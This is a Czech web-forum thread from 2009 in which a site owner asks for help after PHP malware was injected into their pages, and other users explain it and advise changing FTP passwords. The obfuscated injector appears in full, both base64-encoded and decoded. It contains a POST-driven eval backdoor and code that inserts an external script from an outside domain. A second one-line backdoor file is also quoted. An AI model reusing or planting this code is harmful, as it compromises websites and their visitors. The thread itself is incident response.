Autor | Zpráva | ||
---|---|---|---|
msigmund Profil |
#1 · Zasláno: 22. 10. 2009, 10:00:46
Dobrý den,
prosím vás všechny odborníky o pomoc. Prosím hodně. Na stránkách se mi přes noc objevil tento kód a stránky nefungovaly. Stačilo ho smazat, ale co se stalo prosím a dá se tomu předejít. <?php eval(base64_decode('aWYoIWlzc2V0KCRsYXcxKSl7ZnVuY3Rpb24gbGF3KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc 2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW 15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYX RjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSR zPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4j aXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqO lxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaX MnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk50WTJ4MVpHaHBZVzVoTG1sdUwyVjJ aVzUwWDJsdFlXZGxMMk50WTE5c2RXUm9hV0Z1WVY5b2IzTndhWFJoYkM1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxi b2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO 31mdW5jdGlvbiBsYXcyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGxhdzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGxhdzEpKWNhbGxfdXNlcl9mdW 5jKCRsYXcxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2xhdycpcmV0dXJuO2Vsc2V pZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1j b3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdsYXcnKTtmb3IoJGk9M DskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kbGF3bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGF 3MicpKSE9J2xhdzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?> Děkuji všem. |
||
roberta Profil |
#2 · Zasláno: 22. 10. 2009, 10:08:11
vymaž to a zmeň si ftp heslo.
|
||
Alphard Profil |
#3 · Zasláno: 22. 10. 2009, 10:09:14
|
||
Joker Profil |
#4 · Zasláno: 22. 10. 2009, 10:26:02 · Upravil/a: Joker
msigmund:
Virus. Viz odkaz od Alpharda. Pro zajímavost, po dekódování všech base64 a vypadá kód toho viru takhle: Podstatný je asi hlavně poslední řádek (skript čeká na předání nějakého PHP kódu, který pak vykoná) if(!isset($law1)){ function law($s){ if(preg_match_all('#<script(.*?)</script>#is',$s,$a)) foreach($a[0] as $v) if(count(explode("\n",$v))>5) { $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v); if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write'))) $s=str_replace($v,'',$s); } if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a)) foreach($a[0] as $v) if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>')) $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s); $s=str_replace($a='<script src=http://cmcludhiana.in/event_image/cmc_ludhiana_hospital.php ></script>'),'',$s); if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s); elseif(strpos($s,',a')) $s.=$a;return $s; } function law2($a,$b,$c,$d) { global $law1; $s=array(); if(function_exists($law1)) call_user_func($law1,$a,$b,$c,$d); foreach(@ob_get_status(1) as $v) if(($a=$v['name'])=='law') return; elseif($a=='ob_gzhandler') break; else $s[]=array($a=='default output handler'?false:$a); for($i=count($s)-1;$i>=0;$i--) { $s[$i][1]=ob_get_contents(); ob_end_clean(); } ob_start('law'); for($i=0;$i<count($s);$i++) { ob_start($s[$i][0]); echo $s[$i][1]; } } } $lawl=(($a=@set_error_handler('law2'))!='law2') ? $a:0; eval(base64_decode($_POST['e'])); |
||
msigmund Profil |
#5 · Zasláno: 22. 10. 2009, 11:05:52
Právě to čistím a narazil jsem ještě na soubor "gifimg.php" ve složce images a kód je
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> Jinak to infikovalo všechny soubory "index.php - config.php - db.php" ve všech složkách. |
||
msigmund Profil |
#6 · Zasláno: 22. 10. 2009, 11:29:53
Je to hotové, ale chtěl jsem se ještě zeptat píšou nepoužívat Total Commander, ale já se dočetl na internetu, že verze 7.50a má lepší šifrování hesel tak jí používám. Já píšu v PSPadu a soubory posílám přes TC. Jinde hesla nemám. Co byste mi poradily.
Děkuji všem za velkou pomoc. |
||
Joker Profil |
#7 · Zasláno: 22. 10. 2009, 11:39:10
msigmund:
„Co byste mi poradily.“ Jestli to tedy není otázka jen pro programátorky a mohou radit i muži, asi nejlepší varianta je nemít uložené heslo a zadávat ho při připojení zvlášť. Anebo zkusit trik s ukládáním pozměněného hesla (viz odkaz v příspěvku #3) |
||
Bubák Profil |
#8 · Zasláno: 22. 10. 2009, 12:51:57
msigmund:
„verze 7.50a má lepší šifrování hesel tak jí používám“ A máš šifrování pomocí "hlavního hesla" zapnuto? |
||
msigmund Profil |
#9 · Zasláno: 22. 10. 2009, 13:42:40
Ano ke každému heslu dávám i hlavní heslo.
Je to šifrování bezpečné nebo není. |
||
Časová prodleva: 14 let
|
0